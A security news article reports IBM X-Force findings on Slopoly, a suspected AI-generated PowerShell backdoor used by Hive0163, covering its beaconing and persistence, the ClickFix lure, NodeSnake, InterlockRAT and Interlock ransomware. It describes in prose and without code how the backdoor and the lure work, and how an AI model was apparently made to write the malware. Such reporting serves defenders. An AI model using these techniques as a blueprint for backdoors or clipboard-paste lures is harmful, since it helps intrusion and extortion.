Hive0163 Ransomware Operators Deploy AI-Generated Slopoly Malware in Sophisticated Attack
Researchers have identified a case of suspected AI-generated malware, known as “Slopoly,” utilized in a ransomware attack linked to the financially motivated cybercrime group Hive0163. This development indicates a potential shift in tactics among cybercriminals, who are beginning to integrate AI-generated tools into their operations.
Hive0163 and the Experimentation with AI-Generated Malware
Hive0163 is a collective of threat actors recognized for orchestrating ransomware campaigns focused on large-scale data theft and extortion. The group has been implicated in various global ransomware incidents, including those involving Interlock ransomware, as well as custom backdoors and loaders such as NodeSnake, InterlockRAT, and the JunkFiction loader.
In early 2026, IBM X-Force analysts uncovered that Hive0163 deployed Slopoly, a suspected AI-generated malware framework designed to ensure persistent access to compromised servers. The investigation revealed that the attackers maintained access to the infected machine for over a week using this malware.
Notably, Slopoly was employed during the latter stages of the attack, suggesting that the operators were testing the AI-generated framework in a real-world scenario. Researchers characterized the situation as akin to a “live-fire exercise,” where the threat actors experimented with the new tool during an active operation.
The variable naming conventions within the script indicated that the code generation system was explicitly instructed to produce malicious functionality. This raises concerns that any safety measures implemented in the underlying AI model were effectively bypassed. Although researchers could not identify the specific model that generated Slopoly, the overall quality suggested it was likely produced by a less advanced system.
Slopoly as a Suspected LLM-Generated C2 Tool
The Slopoly malware was discovered as a PowerShell script on an infected server. Analysis revealed that it functioned as the client component of a command-and-control (C2) framework utilized by Hive0163. Investigators believe the malware was generated through a builder tool that automatically inserted configuration data, including session IDs, mutex names, C2 server addresses, and beacon intervals. The builder reportedly deployed Slopoly into the directory C:ProgramDataMicrosoftWindowsRuntime and established persistence by creating a scheduled task named “Runtime Broker.”
Several characteristics strongly suggest that Slopoly was produced using a large language model. The script featured extensive comments, structured logging functions, clear error handling routines, and well-named variables—traits commonly associated with AI-generated malware and AI-assisted programming.
Another indication of AI-assisted development was the presence of an unused “Jitter” function within the code, which researchers believe may have been a remnant from iterative development with a language model. Interestingly, the script’s internal comments referred to it as a “Polymorphic C2 Persistence Client.” However, the malware does not exhibit true polymorphic behavior; it cannot modify its own code during execution. Instead, the builder likely generates new variants of the malware with randomized configuration values and function names, a common technique among malware developers.
How Slopoly Operates on Infected Systems
Despite its limited technicalities, Slopoly functions as a backdoor. Upon execution, it collects basic system information from the infected machine and transmits it to a remote command-and-control server. The data is sent in JSON format using an HTTP POST request to the /api/commands endpoint. Typical beacons include information such as the public IP address of the infected system, user account names, computer names, and whether the process is running with elevated privileges.
The malware sends heartbeat messages every 30 seconds and checks for new commands approximately every 50 seconds. Any instructions received from the C2 server are executed using cmd.exe, with the results sent back to the server. Additionally, Slopoly maintains a detailed log file named persistence.log, which records activity and rotates once it reaches a size of 1 MB.
Initial Infection Through ClickFix
The attack investigated by researchers commenced with a social engineering technique known as ClickFix. This method deceives victims into executing malicious PowerShell commands themselves. Victims are typically presented with a CAPTCHA-style verification page that secretly copies a malicious script into the clipboard. The page instructs users to press a sequence of keyboard commands—“Win+R” to open the Windows Run dialog, followed by “Ctrl+V” to paste the script and “Enter” to execute it.
Once executed, the PowerShell payload installs NodeSnake, a NodeJS-based malware that serves as the first stage of a larger command-and-control framework utilized by Hive0163. NodeSnake supports multiple commands, including downloading and executing payloads, running shell commands, establishing persistence, updating itself, or terminating its own process.
In the observed attack, NodeSnake eventually deployed a more advanced JavaScript-based backdoor known as InterlockRAT, which supports WebSocket communications, reverse shell access, and SOCKS5 tunneling capabilities.
Ransomware Deployment and Encryption
The final stage of the intrusion involved deploying Interlock ransomware, packaged using the JunkFiction loader. Once executed, the ransomware scans logical drives and encrypts targeted files across the system. Interlock employs a combination of AES-GCM encryption and RSA cryptography through the OpenSSL library (version 3.5.0). Each encrypted file receives a unique session key, which is then secured using an attacker-controlled RSA public key.
Encrypted files are typically renamed with extensions such as .!NT3RLOCK or .int3R1Ock. After completing the encryption process, the ransomware drops a ransom note, often named FIRST_READ_ME.txt, containing instructions for victims to contact the attackers.
As reported by thecyberexpress.com, this incident underscores the evolving tactics of cybercriminals, particularly in their use of AI-generated tools to enhance their operational capabilities.
